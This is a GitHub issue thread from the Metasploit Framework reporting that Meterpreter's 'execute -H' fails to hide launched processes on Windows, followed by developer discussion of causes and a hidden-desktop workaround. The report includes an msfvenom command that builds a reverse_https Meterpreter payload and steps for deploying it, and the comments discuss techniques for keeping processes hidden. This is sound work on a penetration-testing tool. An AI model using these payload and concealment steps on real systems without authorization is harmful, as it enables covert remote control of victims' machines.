### ISSUE TITLE
meterpreter > execute -H does not hide the process

### ISSUE THREAD

**Issue by wchen-r7** [rapid7/metasploit-framework#7088]
By using windows/meterpreter/reverse_https, the `execute -H` command doesn't seem to hide the process from view. In the following example, here's what I did:
1. First create the Meterpreter: `./msfvenom -p windows/meterpreter/reverse_https lhost=[ip] lport=[port] -f exe -o /tmp/payload.exe`
2. Upload the payload to a Windows 7 SP1 box
3. Start a windows/meterpreter/revers_https handler, and make sure you get a connection.
4. In the Meterpreter prompt, do `execute -H -f calc.exe`
5. On the Windows box, you will actually see Calculator on the screen, which is not the expected behavior.

Proof:

![screen shot 2016-07-11 at 11 09 56 am](https://cloud.githubusercontent.com/assets/1170914/16737704/298cd5ce-4758-11e6-88fe-2107b7abb72e.png)

**Comment by wchen-r7** [comment]
The problem does not seem to be unique to windows/meterpreter/reverse_https. Tried the same with windows/meterpreter/reverse_tcp against Windows Server 2003, same problem.

**Comment by wchen-r7** [comment]
ah you're right, kind of a known problem:

http://forums.devshed.com/delphi-programming-90/sw_hide-createprocess-api-497017.html

**Comment by wwebb-r7** [comment]
If you're able to run notepad or other programs hidden from meterpreter, my best guess would be that applications rendering with GDI+, like calc seems to be, are ignoring the flag.  I'm not sure how you'd hide one off the top of my head if that's the case.

**Comment by OJ** [comment]
My understanding was that it's application-dependant mainly because applications themselves have the ability to ignore what the OS tells it to do. IIRC, the `wShowWindow` parameter is only considered when the application launches the main window with `SW_SHOWDEFAULT`. If the application is coded to use something like `SW_SHOW` instead, then the value passed in to `CreateProcess` via the `sShowWindow` member is effectively ignored.

I might be wrong though, my memory in this area is rather dusty!

**Comment by wwebb-r7** [comment]
One solution and/or possible new 'execute' option that occurred to me which would ensure the process window remains hidden would be using CreateDesktop() and spawning the process within that context.  All the cool kids have been implementing this in their malware for years, so I'm a bit ashamed I didn't think of it sooner.

I'm far too tired to tinker with it right now, but my only concern would be communication between the original meterp process and the hidden process.  They may work perfectly fine, they may break everything, or they may do a little of both, the latter of which I suspect.  I'll just have to look into it sometime.  It may be advantageous to simply create a payload stager which launches meterpreter inside of a new, hidden desktop.

**Comment by OJ** [comment]
I have a branch somewhere locally that does exactly this :)

**Comment by wwebb-r7** [comment]
Worth pushing to a remote branch even if it's broken imo.  I don't have time at the moment to work on it but perhaps someone will.

**Comment by OJ** [comment]
I'll dig it up and see if it's worthy of humiliating myself with! If not I'm happy to put some time into it.

**Comment by egypt** [comment]
@OJ did you dig it up?  =)

**Comment by OJ** [comment]
I haven't found it yet. But I will, or I'll rebuild it.
